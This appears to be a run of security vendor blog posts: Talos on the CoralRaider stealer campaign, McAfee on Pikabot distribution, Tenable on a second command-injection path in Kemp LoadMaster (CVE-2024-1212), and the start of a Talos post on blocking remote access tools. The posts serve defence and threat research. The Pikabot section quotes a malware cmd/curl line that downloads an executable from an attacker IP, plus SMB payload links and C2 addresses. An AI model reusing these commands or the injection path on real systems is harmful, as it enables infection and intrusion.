D:\ROT\ROT\Build rot Export\2024\Bot Export Trứ\149.248.79.205 - NetFrame 4.5 Run Dll - 2024\ChromeCrashServices\obj\Debug\FirefoxCrashSevices.pdb

D:\ROT\ROT\Build rot Export\2024\Bot Export Trứ\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\GPT\bin\Debug\spoolsv.pdb


D:\ROT\ROT\Build rot Export\2024\Bot Export Chiến\14.225.210.XX-Chiến -Ver 2.0\GPT\bin\Debug\spoolsv.pdb


D:\ROT\ROT\Build rot Export\2024\Bot Export Trứ\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\GPT\bin\Debug\SkypeApp.pdb


D:\ROT\ROT\Build rot Export\2024\Bot Export Chiến\14.225.210.XX-Chiến -Ver 2.0\GPT\bin\Debug\spoolsv.pdb


D:\ROT\ROT\ROT Ver 5.5\Source\Encrypted\Ver 4.8 - Client Netframe 4.5\XClient\bin\Debug\AI.pdb


CoralRaider targets victims’ data and social media accounts

Another image we analyzed is an Excel spreadsheet that likely contained the victims’ data. We have redacted the images to maintain confidentiality. The spreadsheet has several tabs in Vietnamese, and their English translation showed us the tabs “Employee salary spreadsheet,” “advertising costs,” “website to buy copies,” “PayPal related,” and “can use.” The spreadsheet seemed to have multiple versions — the first was created on May 10, 2023. We also spotted that they have logged into their Microsoft Office 365 account with the display name “daloia krag” while accessing the spreadsheet, and CoralRaider likely operates the account. 

CoralRaider targets victims’ data and social media accounts

CoralRaider’s payload, XClient stealer analysis, showed us a few more indicators. CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer. The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration. One example function we observed is used to steal the victim’s Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created, etc.

CoralRaider targets victims’ data and social media accounts

The campaign  

Talos observed that CoralRaider is conducting a malicious campaign targeting victims in multiple countries in Asia and Southeast Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam. 

The initial vector of the campaign is the Windows shortcut file. We are unclear on the technique the actor used to deliver the LNKs to the victims. Some of the shortcut file filenames that we observed during our analysis are:

  • 자세한 비디오 및 이미지.lnk
  • 設計內容+我的名片.lnk
  • run-dwnl-restart.lnk
  • index-write-upd.lnk
  • finals.lnk
  • manual.pdf.lnk
  • LoanDocs.lnk
  • DoctorReferral.lnk
  • your-award.pdf.lnk
  • Research.pdf.lnk
  • start-of-proccess.lnk
  • lan-onlineupd.lnk
  • refcount.lnk

We also discovered a few notable unique drive serial numbers from the metadata of the Windows Shortcut files:

  • A0B4-2B36
  • FA4C-C31D
  • 94AA-CEFB
  • 46F7-AF3B

The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled download server. The HTA file executes an embedded obfuscated Visual Basic script. The malicious Visual Basic script executes an embedded PowerShell script in the memory, which decrypts and sequentially executes three other PowerShell scripts that perform anti-VM and anti-analysis checks, bypass the User Access Controls, disables the Windows and application notifications on the victim’s machine, and finally downloads and run the RotBot. 

RotBot, the QuasarRAT client variant, in its initial execution phase, performs several detection evasion checks on the victim machine and conducts system reconnaissance. RotBot then connects to a host on a legitimate domain, likely controlled by the threat actor, and downloads the configuration file for the RotBot to connect to the C2. CoralRaider uses the Telegram bot as the C2 channel in this campaign. 

After connecting to the Telegram C2, RotBot loads the payload XClient stealer onto the victim memory from its resource and runs its plugin program. The XClient stealer plugin performs anti-VM and anti-virus software checks on the victim's machine. It executes its functions to collect the victim's browser data, including cookies, stored credentials, and financial information such as credit card details. It also collects the victim’s data from social media accounts, including Facebook, Instagram, TikTok business ads, and YouTube. It also collects the application data from the Telegram desktop and Discord application on the victim's machine. The stealer plugin can capture screenshots of the victim’s desktop and save them as a PNG file in the victim's machine’s temporary folder. With PNG files, the stealer plugin dumps the collected victim’s data from the browser and social media accounts in a text file and creates a ZIP archive. The PNG and ZIP files are exfiltrated to the attacker's Telegram bot C2.

CoralRaider targets victims’ data and social media accounts
Infection flow diagram.

RotBot loads and runs the payload  

RotBot, a remote access tool (RAT) compiled on Jan. 9, 2024, is downloaded and runs on the victim machine disguised as a Printer Subsystem application “spoolsv.exe.” RotBot is a variant of the QuasarRAT client that the threat actor has customized and compiled for this campaign. 

During its initial execution, RotBot performs several checks on the victim’s machine to evade detection, including IP address, ASN number, and running processes of the victim’s machine. It performs reconnaissance of system data on the victim machine. It also configures the internet proxy on the victim machine by modifying the registry key: 

Software\Microsoft\Windows\CurrentVersion\Internet 

Settings with the values:

ProxyServer = 127.0.0.1:80

ProxyEnable = 1

We observed that RotBot discovered in this campaign creates mutex in the victim machine as the infection markers​​ using the hardcoded strings in the binary.

CoralRaider targets victims’ data and social media accounts

RotBot loads and runs the XClient stealer module from its resources and uses the configuration parameters for its Telegram C2 bot from the downloaded configuration file. 

CoralRaider targets victims’ data and social media accounts

CoralRaider targets victims’ data and social media accounts

XClient stealer targets victims’ social media accounts. 

The XClient stealer sample we analyzed in this campaign is a .Net executable compiled on Jan. 7, 2024. It has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks. 

CoralRaider targets victims’ data and social media accounts

XClient stealer has three primary functions that help it to avoid the radar. First, it will do virtual environment evasion if the victim’s machine runs in VMware or VirtualBox. It also checks if a DLL called sbieDll.dll exists in the victim machine file system to detect if it runs in the Sandboxie environment. XClient stealer also checks if anti-virus software, including AVG, Avast, and Kaspersky, is running on the victim’s machine. 

After bypassing all the checking functions, the XClient stealer captures the victim’s machine screenshot, saves it with the “.png” extension in the victim’s temporary user profile folder, and sends it to C2 through the URL “/sendPhoto.” 

XClient stealer steals victims’ social media web application credentials, browser data, and financial information such as credit card details. It targets Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browser data files through the absolute paths of the respective browser installation paths. It extracts the contents of the browser database to a text file in the victim’s profile local temporary folder. 

XClient stealer hijacks and steals various Facebook data from the victim’s Facebook account. It sets custom HTTP header metadata along with the victim’s stolen Facebook cookie, and the username sends requests to Facebook APIs through the URLs below.

CoralRaider targets victims’ data and social media accounts

It checks if the victim’s Facebook is a business or ads account and uses regular expressions to search for access_token, assetID, and paymentAccountID. Using Facebook graph API, XClient attempts to collect an extensive list of information from the victim’s account, shown in the table below.

Entities

Value place holders

facebook_pages

verification_status, fan_count, followers_count, is_owned, name, is_published,is_promotable, parent_page, promotion_eligible, has_transitioned_to_new_page_experience, picture, roles

Adaccounts, businesses

name, permitted_roles, can_use_extended_credit, primary_page, wo_factor_type, client_ad_accounts, verification_status, id, created_time, is_disabled_for_integrity_reasons, sharing_eligibility_status, allow_page_management_in_www, timezone_id, timezone_offset_hours_utc

owned_ad_accounts

id, currency, timezone_offset_hours_utc, timezone_name,adtrust_dsl

Business_users

name, account_status, account_id, owner_business, created_time, next_bill_date, currency, timezone_name, timezone_offset_hours_utc, business_country_code, disable_reason, adspaymentcycle{threshold_amount}, has_extended_credit, adtrust_dsl, funding_source_details, balance, is_prepay_account, owner

XClient stealer also collects the financial information from the victims’ Facebook business and ads accounts.

Payment related entities

Value Place holders

pm_credit_card

display_string, exp_month, exp_year, is_verified

payment_method_direct_debits

address, can_verify, display_string, s_awaiting, is_pending,

status

payment_method_paypal

email_address

payment_method_tokens

Current_balance, original_balance, time_expire, type

amount_spent, userpermissions

user, role

 Using the graph API, XClient stealer retrieves victims’ account friend list details and pictures. 

CoralRaider targets victims’ data and social media accounts

XClient stealer also targets the victim’s Instagram account and YouTube accounts through the URLs and collects various information, including username, badge_count, appID, accountSectionListRenderer, contents, title, data, actions, getMultiPageMenuAction, menu, multiPageMenuRenderer, sections and hasChannel. It collects the application data from the Telegram desktop and Discord application on the victim’s machine. XClient also collects the data from the victim’s TikTok business account and checks for business ads. 

Talos compiled the hardcoded HTTP request header metadata the XClient stealer uses in this campaign while retrieving the victim’s information from Facebook, Instagram, and YouTube accounts. 

Facebook

  • sec-ch-ua-mobile: ?0

  • sec-ch-ua-platform: \"Windows\"

  • sec-fetch-dest: document

  • sec-fetch-mode: navigate

  • sec-fetch-site: none

  • sec-fetch-user: ?1

  • upgrade-insecure-requests: 1

  • user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36

  • sec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\", \"Google Chrome\";v=\"108\"

  • sec-ch-ua-mobile: ?0


Instagram

  • Sec-Ch-Prefers-Color-Scheme: light

  • Sec-Ch-Ua: "Google Chrome"; v = "113", "Chromium"; v = "113", "Not-A.Brand"; v = "24"

  • Sec-Ch-Ua-Full-Version-List: "Google Chrome"; v = "113.0.5672.127", "Chromium"; v = "113.0.5672.127", "Not-A.Brand"; v = "24.0.0.0"

  • Sec-Ch-Ua-Mobile: ?0

  • Sec-Ch-Ua-Platform: "Windows"

  • Sec-Ch-Ua-Platform-Version: "10.0.0"

  • Sec-Fetch-Dest: document

  • Sec-Fetch-Mode: navigate

  • Sec-Fetch-Site: none

  • Sec-Fetch-User: ?1

  • Upgrade-Insecure-Requests: 1

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 113.0.0.0 Safari / 537.36


Youtube

  • content-type: application/json

  • sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"

  • sec-ch-ua-arch: "x86"

  • sec-ch-ua-bitness: "64"

  • sec-ch-ua-full-version: "113.0.5672.127"

  • sec-ch-ua-full-version-list: "Google Chrome";v="113.0.5672.127", "Chromium";v="113.0.5672.127", "Not-A.Brand";v="24.0.0.0"

  • sec-ch-ua-mobile: ?0

  • sec-ch-ua-model: ""

  • sec-ch-ua-platform: "Windows"

  • sec-ch-ua-platform-version: "10.0.0"

  • sec-ch-ua-wow64: ?0

  • sec-fetch-dest: empty

  • sec-fetch-mode: same-origin

  • user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36

  • x-goog-authuser: 0

  • x-origin: https://www.youtube.com

  • x-youtube-bootstrap-logged-in: true

  • x-youtube-client-name: 1

Finally, the XClient stealer stores the victim’s social media data, which is collected into a text file in the local user profile temporary folder and creates a ZIP archive. The ZIP files were exfiltrated to the Telegram C2 through the URL “/sendDocument”.

CoralRaider targets victims’ data and social media accounts

Talos’ research of this campaign focused on discovering and disclosing a new threat actor of Vietnamese origin and their payloads. Additional technical details of the attack chain components of this campaign can be found in the report published by the researchers at QiAnXin Threat Intelligence Center. 

Coverage

CoralRaider targets victims’ data and social media accounts

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SID for this threat is 63192.

ClamAV detections are also available for this threat:

Lnk.Downloader.CoralRaider-10024620-0

Html.Downloader.CoralRaider-10025101-0

Win.Trojan.RotBot-10024631-0

Win.Infostealer.XClient-10025106-2

Indicators of Compromise

Indicators of Compromise associated with this threat can be found here.

Embracing innovation: Derrick’s transition from banking to Microsoft’s Threat Intelligence team

Meet Derrick, a Senior Program Manager on the Operational Threat Intelligence team at Microsoft. Derrick’s role involves understanding and roadmapping the complete set of tools that Threat Intel analysts use to collect, analyze, process, and disseminate threat intelligence across Microsoft. Derrick’s love of learning and his natural curiosity led him to a career in technology and ultimately, to his current role at Microsoft.

Distinctive Campaign Evolution of Pikabot Malware

Authored by Anuradha and Preksha

Introduction

PikaBot is a malicious backdoor that has been active since early 2023. Its modular design is comprised of a loader and a core component. The core module performs malicious operations, allowing for the execution of commands and the injection of payloads from a command-and-control server. The malware employs a code injector to decrypt and inject the core module into a legitimate process. Notably, PikaBot employs distribution methods, campaigns, and behavior reminiscent of Qakbot.

Distribution Methods

PikaBot, along with various other malicious loaders like QBot and DarkGate, heavily depends on email spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails tailored for specific countries. These emails frequently include links to external Server Message Block (SMB) shares hosting malicious zip files.

SMB shares refer to resources or folders on a server or computer accessible to other devices or users on a network using the SMB protocol. The threat actors frequently exploit such shares for malware distribution. In this instance, the act of downloading and opening the provided zip file leads to PikaBot infection.

Distinctive Campaigns

During February 2024, McAfee Labs observed a significant change in the campaigns that distribute Pikabot.

Pikabot is distributed through multiple file types for various reasons, depending on the objectives and nature of the attack. Using multiple file types allows attackers to exploit diverse attack vectors. Different file formats may have different vulnerabilities, and different ways of detection by security software so attackers may try various formats to increase their chances of success and evade detection by bypassing specific security measures.

Attackers often use file types that are commonly trusted by users, such as Zip or Office documents, to trick users into opening them. By using familiar file types, attackers increase the likelihood that their targets will interact with the malicious content. Malware authors use HTML with JavaScript features as attachments, a common technique, particularly when email formatting is converted to plain text, resulting in the attachment of the HTML content directly to the email. Attackers use SMB to propagate across the network and may specifically target SMB shares to spread their malware efficiently. Pikabot takes advantage of the MonikerLink bug and attaches an SMB link in the Outlook mail itself.

Figure 1. Distinctive Campaigns of Pikabot

Attackers demonstrated a diverse range of techniques and infection vectors in each campaign, aiming to deliver the Pikabot payload. Below we have summarized the infection vector that has been used in each campaign.

  1. HTML
  2. Javascript
  3. SMB Share
  4. Excel
  5. JAR

It is uncommon for an adversary to deploy so many attack vectors in the span of a month.

Campaign Analysis

In this section, a comprehensive breakdown of the analysis for each campaign is presented below.

1.HTML Campaign

In this campaign, Pikabot is distributed through a zip file that includes an HTML file. This HTML file then proceeds to download a text file, ultimately resulting in the deployment of the payload.

The below HTML code is a snippet from the malware where it is a properly aligned HTML that has a body meta redirection to a remote text file hosted at the specified URL. There are distractions in the HTML which are not rendered by the browser.

Figure 2.HTML Code

The above highlighted meta tag triggers an immediate refresh of the page and redirects the browser to the specified URL: ‘file://204.44.125.68/mcqef/yPXpC.txt’. This appears to be a file URL, pointing to a text file on a remote server.

Here are some reasons why an attacker might choose a meta tag refresh over traditional redirects:

Stealth and Evasion: Meta tag refreshes can be less conspicuous than HTTP redirects. Some security tools and detection mechanisms may be more focused on identifying and blocking known redirect patterns.

Client-Side Execution: Meta tag refreshes occur on the client side (in the user’s browser), whereas HTTP redirects are typically handled by the server. This may allow attackers to execute certain actions directly on the user’s machine, making detection and analysis more challenging.

Dynamic Behavior: Meta tag refreshes can be dynamically generated and inserted into web pages, allowing attackers to change the redirection targets more easily and frequently. This dynamic behavior can make it harder for security systems to keep up with the evolving threat landscape.

In this campaign, McAfee blocks the HTML file.

Figure 3.HTML file

2. Javascript Campaign

Distributed through a compressed zip file, the package includes a .js file that subsequently initiates the execution of curl.exe to retrieve the payload.

Infection Chain:

.zip->.js->curl->.exe

Code snippet of .js file:

Figure 4. Javascript Code

When the JavaScript is executed, it triggers cmd.exe to generate directories on the C: drive and initiates curl.exe to download the payload.

Since the URL “hxxp://103.124.105.147/KNaDVX/.dat” is inactive, the payload is not downloaded to the below location.

Commandline:

‘”C:\Windows\System32\cmd.exe” /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh & curl hxxp://103.124.105.147/KNaDVX/0.2642713404338389.dat –output C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\Ngjhjhjda.exe’

McAfee blocks both the javascript and the exe file thus rendering McAfee customers safe from this campaign.

Figure 5. JS file

Figure 6. EXE file

3. SMB share Campaign:

In this campaign, Malware leverages the MonikerLink bug by distributing malware through email conversations with older thread discussions, wherein recipients receive a link to download the payload from an SMB share. The link is directly present in that Outlook mail.

Infection Chain:

EML ->SMB share link->.zip->.exe

Spam Email:

Figure 7. Spam email with SMB share link

SMB Share link: file://newssocialwork.com/public/FNFY.zip

In this campaign, McAfee successfully blocks the executable file downloaded from the SMB share.

Figure 8. EXE file

 4: Excel Campaign

Figure 9. Face in Excel

Infection Chain:

.zip >.xls > .js > .dll

This week, threat actors introduced a novel method to distribute their Pikabot malware. Targeted users received an Excel spreadsheet that prompted them to click on an embedded button to access “files from the cloud.”

Upon hovering over the “Open” button, we can notice an SMB file share link -file:///\\85.195.115.20\share\reports_02.15.2024_1.js.

Bundled files in Excel:

Figure 10. Bundled files inside Excel

The Excel file doesn’t incorporate any macros but includes a hyperlink directing to an SMB share for downloading the JavaScript file.

The hyperlink is present in the below relationship file.

Figure 11. XML relationship file

Content of relationship file:

Figure 12. xl/drawings/_rels/drawing1.xml.rels

Code of JS file:

Figure 13. Obfuscated javascript code

The JS file contains mostly junk codes and a small piece of malicious code which downloads the payload DLL file saved as “nh.jpg”.

Figure 14. Calling regsvr32.exe

The downloaded DLL payload is executed by regsvr32.exe.

In this campaign, McAfee blocks the XLSX file.

Figure 15. XLSX file

5.JAR Campaign

In this campaign, distribution was through a compressed zip file, the package includes a .jar file which on execution drops the DLL file as payload.

Infection Chain:

.zip>.jar>.dll

On extraction, the below files are found inside the jar file.

Figure 16. Extraction of JAR file

The MANIFEST file indicates that hBHGHjbH.class serves as the Main-Class in the provided files.

The jar file on execution loads the file “163520” as a resource and drops it as .png to the %temp% location which is the payload DLL file.

Figure 17. Payload with .png extension

Following this, java.exe initiates the execution of regsvr32.exe to run the payload.

In this campaign, McAfee blocks both the JAR and DLL files.

Figure 18. JAR file

Figure 19. DLL file

Pikabot Payload Analysis:

Pikabot loader:

Due to a relatively high entropy of the resource section, the sample appears packed.

Figure 20. Loader Entropy

Initially, Malware allocates memory using VirtualAlloc (), and subsequently, it employs a custom decryption loop to decrypt the data, resulting in a PE file.

Figure 21. Decryption Loop

Figure 22. Decrypted to get the PE file

Core Module:

Once the data is decrypted, it proceeds to jump to the entry point of the new PE file. When this PE file gets executed, it injects the malicious content in ctfmon.exe with the command line argument “C:\Windows\SysWOW64\ctfmon.exe -p 1234”

Figure 23. Injection with ctfmon.exe

To prevent double infection, it employs a hardcoded mutex value {9ED9ADD7-B212-43E5-ACE9-B2E05ED5D524} by calling CreateMutexW(), followed by a call to GetLastError() to check the last error code.

Figure 24. Mutex

Network communication:

Malware collects the data from the victim machine and sends it to the C2 server.

Figure 25. Network activity

PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).

Figure 26. Network activity

C2 server communication:

Figure 27. C2 communication

IOCs:

C2 found in the payload are:

178.18.246.136:2078

86.38.225.106:2221

57.128.165.176:1372

File Type SHA 256
ZIP 800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a
HTML 9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82
ZIP 4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd
JS 9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849
EXE 89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9
ZIP f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512
EXE aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1
XLSX bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5
JS 49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72
ZIP d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04
JAR d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4
DLL 7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e

 

 

The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.

Another Path to Exploiting CVE-2024-1212 in Progress Kemp LoadMaster

Intro

Rhino Labs discovered a pre-authentication command injection vulnerability in the Progress Kemp LoadMaster. LoadMaster is a load balancer product that comes in many different flavors and even has a free version. The flaw exists in the LoadMaster API. When an API request is received to either the ‘/access’ or ‘/accessv2’ endpoint, the embedded min-httpd server calls a script which in turn calls the access binary with the HTTP request info. The vulnerability works even when the API is disabled.

Rhino Labs showed that attacker controlled data is read by the access binary when sending an enableapi command to the /access endpoint. The attacker controlled data exists as the ‘username’ in the Authorization header. The username value is put into the REMOTE_USER environment variable. The value stored in REMOTE_USER is retrieved by the access binary and ends up as part of a string passed to a system() call. The system call executes the validuser binary and a carefully crafted payload allows us to inject commands into the bash shell.

GET request showing the resulting bash command. The response shows a bash syntax error that indicates the command line that was executed
GET request showing the resulting bash command

We also found that the REMOTE_PASS environment variable is exploitable in the same way here via the Authorization header.

This command execution is possible via any API command if the API is enabled. As Rhino Labs points out, When sending a GET request to the access API indicating the enableapi command, the access binary skips checking whether the API is enabled first or not, and the Authorization header is checked right away.

APIv2

While investigating this vulnerability, I noticed that LoadMaster has two APIs, the v1 API indicated above, and a v2 API that functions via the /accessv2 endpoint and JSON data. The access binary still processes these requests, but a slightly different path is followed. The logic of the main function is largely duplicated as a new function and called if the APIv2 is requested. That function then performs the same checks as above, with the slight exception that it will decode the API and pass the values of the apiuser and apipass keys to the same system call. So, we have another path to the same exposure:

This is the second exploitable path via the APIv2. A POST request is sent to the LoadMaster APIv2, and a response indicates the output of the command we injected.
POST request to the LoadMaster APIv2, also exploitable

While we can still control the password variable, it’s no longer exploitable here. Somewhere along the path the password string gets converted to base64 before being passed through the system() call, nullifying any injected quotes.

POST request to the APIv2 showing that apipass is base64 encoded, effectively removing any single quotes

We can see below that the verify_perms function calls validu() with REMOTE_USER and REMOTE_PASS data in the APIv1 implementation; in the API v2 implementation the apiuser and apipass data is passed to validu() from the APIv2 JSON.

Screenshot of the Ghidra decompilation showing the two different paths for API and APIv2
Ghidra decompilation showing API and APIv2 paths

Patch

The patch solves these flaws quite simply by examining the username and password strings in the Authorization header for single quotes. If they contain a single quote, the patched function will truncate them just before the first single quote. Decompiling the patched access binary with Ghidra, we can see this:

Ghidra decompilation of the patched validu function. It shows the new function call and then the ‘validuser’ string being concatenated and then the system() call after.
Ghidra decompilation of the patched validu function
Code from Ghidra decompilation of the function added by the patch. The function loops over each character of the input string, and if it’s a single quote, it is replaced with a null terminator.
Ghidra decompilation of the function in the patch that null terminates strings at the first single quote

Here we see the addition of the new function call for both username and password. The function loops over each character in the input string and if it is a single quote, it’s changed to a \0, null terminating the string.

Another Way to Test: Emulation

Even though we’ve got x86 linux binaries, we can’t run them natively on another linux machine due to potential library and ABI issues. Regardless, we can extract the filesystem and use a chroot and qemu to emulate the environment. Once we’ve extracted the filesystem, we can mount the ext2 filesystem ourselves:

sudo mount -t ext2 -o loop,exec unpatched.ext2 mnt/

Now we can explore the filesystem and execute binaries.

This provides us with a quick offline method to test our assumptions around injection. For instance, as we mentioned, the access binary is exploitable via the REMOTE_USER parameter:

Screenshot of a bash shell showing how we can emulate the access binary to test various different command injections.
Emulating binaries locally to easily test injection assumptions

First, we’ve copied the qemu-x86_64-static binary into our mounted filesystem. We’re using that with the -E flag to pass in a bunch of environment variables found via reversing access, one of which is the injectable REMOTE_USER. The whole thing is wrapped in chroot so that symbolic links and relative paths work correctly. We give /bin/access several flags which we’ve lifted straight from the CGI script that calls the binary

exec /bin/${0/*\//} -C $CLUST -F $FIPS -H $HW_VERSION

and from checking the ps debugging feature in the LoadMaster UI. Pro tip: check ps while running another longer running debug command like top or tcpdump in order to see better results.

root 13333 0.0 0.0 6736 1640 ? S 15:54 0:00 /sbin/httpd -port 8080 -address 127.0.0.1
root 16733 0.0 0.0 6736 112 ? S 15:59 0:00 /sbin/httpd -port 8080 -address 127.0.0.1
bal 16734 0.0 0.0 12064 2192 ? S 15:59 0:00 /bin/access -C 0 -F 0 -H 3
bal 16741 0.2 0.0 11452 2192 ? S 15:59 0:00 /usr/bin/top -d1 -n10 -b -o%CPU
bal 16845 0.0 0.0 7140 1828 ? R 15:59 0:00 ps auxwww

While this doesn’t provide us the complete method to exploit externally, it is a nice quick method to try out different injection strings and test assumptions. We can also pass a -g <port> parameter to qemu and then attach gdb to the process to get even closer to what’s happening.

Conclusion

This was a really cool find by Rhino Labs. Here I add one additional exploitation path and some additional ways to test for this vulnerability.

Tenable’s got you covered and can detect this vulnerability as part of your VM program with Tenable VM, Tenable SC, and Tenable Nessus. The direct check plugin for this vulnerability can be found at CVE-2024-1212. The plugin tests test both APIv1 and APIv2 paths for this command execution exposure.

Resources

https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/

https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212

https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212


Another Path to Exploiting CVE-2024-1212 in Progress Kemp LoadMaster was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Adversaries are leveraging remote access tools now more than ever — here’s how to stop them

  • Remote system management/desktop access tools such as AnyDesk and TeamViewer have grown in popularity since 2020. While there are many legitimate uses for this software, adversaries are also finding ways to use them for command and control in their campaigns.
  • There is no easy way to effectively block all unauthorized remote management tools, but security can be greatly improved through a combination of policy and technical controls.
  • Early warning alerts can be configured to alert defenders to remote management software activity that may have circumvented the technical controls.

The remote management/access software problem

Adversaries are leveraging remote access tools now more than ever — here’s how to stop them

Since 2020, the use of remote system management/access tools such as AnyDesk and TeamViewer has exploded in popularity due to forced work-from-home during the COVID-19 pandemic.

Whether used by an IT help desk technician to fix a user’s remote system or by co-workers for collaboration, these tools play an essential role in most corporations’ digital functions. However, this convenience comes at a cost. These tools introduce the ability for an adversary to potentially take full remote control of a system, are easy to download and install, and can be very difficult to detect since they are considered legitimate software. 

Further complicating the task of recognizing the malicious use of these tools, many organizations struggle to combat “shadow IT” in which individual users or overly proactive IT personnel might install unauthorized remote management tools to accomplish a benign goal.

Cisco Talos Incident Response (Talos IR) is seeing adversaries capitalize on this opportunity in the wild. We recently noted in our Quarterly Trends report for the third quarter of 2023, “AnyDesk was observed in all ransomware and pre-ransomware engagements [. . .], underscoring its role in ransomware affiliates' attack chains.”

While AnyDesk is a legitimate application, it highlights the tremendous value that can be gained through a security program that intentionally focuses on preventing unauthorized use of these tools. Talos is referencing AnyDesk for the purposes of this blog post, but any remote management tool is at risk of these exploits. There are several policy changes, technical countermeasures and security alerts that admins and defenders can use to ensure that AnyDesk, and similar pieces of software, are only used for legitimate purposes when deployed.

Policy change suggestion: Pick one approved remote management tool

Adopting one, or at most two, approved remote management solutions will allow the organization to thoroughly test and deploy in the most secure possible configuration.

If possible, integration with other organizational technology such as Active Directory or multi-factor authentication (MFA) will provide additional layers of protection and verification. Tying the approved remote management solutions into these already structured security solutions can make it easier to build “early warning” detections and alerts around unauthorized connectivity and use.

Once a solution is approved and championed for the organization, other remote management/access tools should be explicitly banned by policy. Ideally, this should be accompanied by a software inventory audit and published guidance on approved/non-approved software for the organization. Training and consistent enforcement of this policy will help reduce the “shadow IT” noise in the environment and leave network defenders with more time to investigate true anomalies.

Technical controls

While very worthwhile, preventing unauthorized use of these tools is not simple. First, the scores of commercially available remote access tools make it difficult to address every option an adversary might use. Many of those tools are frequently updated, meaning that blocking the executables by their hash value is not as effective. 

Adversaries also commonly rename the executables, meaning that filename blocks aren’t going to be helpful, either. 

Many popular solutions operate over common ports and protocols, such as ports 80 and 443, making them difficult to block at the firewall, and remote access tool creators often decline to publish their central server IP addresses due to frequently changing resolutions, which limits the effectiveness of static IP address blocks. A combination of approaches and techniques is necessary to limit the opportunity for an adversary to use remote access/management tools in any given environment.

DNS security controls

One of the most effective methods for detecting, and sometimes blocking, the activities of unauthorized remote management/access software, is by auditing and blocking DNS queries associated with these tools.

If your organization uses Cisco Umbrella for DNS security, it’s fairly easy to review and block DNS queries related to unauthorized traffic.

To review what might already be on your network, log into the Umbrella console and view “Reporting > App Discovery > Unreviewed Apps,” filtered by the “Collaboration” and “IT Services Management” categories, this is an excellent starting point to identify unexpected remote access software.

Simply clicking “Block this app” gives the administrator the ability to block future DNS requests associated with any particular result. If you prefer to take an even more proactive approach, going to “Policies > Policy Components > Application Settings” allows you to search all applications currently categorized by Umbrella, whether they have been seen on your network or not, and block them by policy. Again, the “Collaboration” and “IT Services Management” categories should be the areas of focus for policy review.

As with all of these technical controls, there are a few limitations. The first major caveat is that this only works if the DNS queries are evaluated by your security stack. In the case of DNS traffic from a home user’s system not traveling over the corporate network, the activity would be invisible. The second major caveat is that some remote management software has direct peer-to-peer capabilities, meaning the software might not send a DNS query to an easily identifiable domain when initiating a connection. 

Firewall controls

While less scalable and reliable, basic IP address blocking can be beneficial for preventing unauthorized remote software connections. Some vendors list static IP addresses for their central servers on their support sites that can be leveraged to control this access. However, many vendor IP addresses change periodically, making the task a bit challenging.

